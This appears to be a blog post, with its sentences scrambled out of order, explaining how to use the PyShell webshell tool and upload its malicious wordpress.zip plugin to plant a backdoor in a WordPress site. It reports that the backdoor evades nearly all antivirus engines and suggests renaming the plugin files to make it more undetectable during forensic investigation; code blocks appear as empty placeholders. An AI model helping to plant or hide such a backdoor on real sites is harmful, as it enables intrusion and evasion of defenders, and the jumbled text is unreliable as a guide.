So, let’s fire up pyshell and test if it is possible to communicate with the backdoor. And since shell.php is in the wordpress.zip file the backdoor url will end with shell.php Since the file name is wordpress.zip the slug/subfolder will be wordpress. This looks good! The URL to the backdoor now looks like this: There is no need to activate the plugin, the backdoor works anyway. This is done if you navigate to Plugins -> Add New and then press Upload Plugin in the top of the screen. So, the first step is to upload the plugin. How to get hold of the Super Admin role or access to a WordPress installation is not in scope for this guide. To upload new plugins the user must have the Super Admin role. The next step is to upload the wordpress.zip plugin file to our WordPress installation. Our test is made on Kali Linux 2022.1: git clone Īnd if everything works we should see something like this: The content of the files are as following, PHP-code:įirst we start by cloning the repo from Github and installing the requirements. For example the plugin name is PyShell and makes it pretty obvious if anyone is doing a forensic investigation. And if we look closer into the plugins there are two files:Īnd they are pretty straight forward and easy to change and make them even more undetectable. Only one AV-engine detects the backdoor and its Tencent. When uploading the wordpress.zip file to VirusTotal that scans the file using 58 different antivirus-software engines the result is as following: The default wordpress.zip is fairly undetected by most antivirus-solutions at this time of writing. The wordpress.zip file is a malicious WordPress plugin that places a backdoor into the WordPress installation and makes it possible to communicate to the PyShell shell. And as you can see there is also support for WordPress! The default list with shells that comes with PyShell is below. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. PyShell is new tool made for bug bounty, ethical hacking, penetration testers or red-teamers.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |